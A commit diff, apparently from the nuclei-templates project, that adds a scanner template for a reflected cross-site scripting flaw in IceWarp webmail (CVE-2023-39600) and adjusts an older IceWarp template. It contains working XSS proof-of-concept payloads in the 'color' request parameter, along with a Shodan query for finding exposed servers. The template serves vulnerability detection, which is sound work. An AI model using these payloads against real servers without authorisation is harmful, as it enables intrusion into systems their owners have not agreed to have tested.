Merge pull request #8188 from muthumohanprasath/muthumohanprasath-patch-2

Create CVE-2023-39600.yaml

http/cves/2020/CVE-2020-8512.yaml

@@ -37,6 +37,8 @@ http:
         part: body
         words:
           - "<svg/onload=alert(document.domain)>"
+          - "<strong>IceWarp"
+        condition: and
 
       - type: word
         part: header

http/cves/2023/CVE-2023-39600.yaml

@@ -0,0 +1,47 @@
+id: CVE-2023-39600
+
+info:
+  name: IceWarp 11.4.6.0 - Cross-Site Scripting
+  author: Imjust0
+  severity: medium
+  description: |
+    IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
+  reference:
+    - https://medium.com/@katikitala.sushmitha078/cross-site-scripting-reflected-xss-in-icewarp-server-cve-2023-39600-310a7e1c8817
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-39600
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-39600
+    cwe-id: CWE-79
+    epss-score: 0.0046
+    cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:*
+    epss-percentile: 0.72232
+  metadata:
+    max-request: 1
+    shodan-query: title:"icewarp"
+    vendor: icewarp
+    product: icewarp_server
+  tags: cve,cve2023,icewarp,xss
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/webmail/?color="><img src=x onerror=confirm(document.domain)>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<img src=x onerror=confirm(document.domain)>"
+          - "IceWarp"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200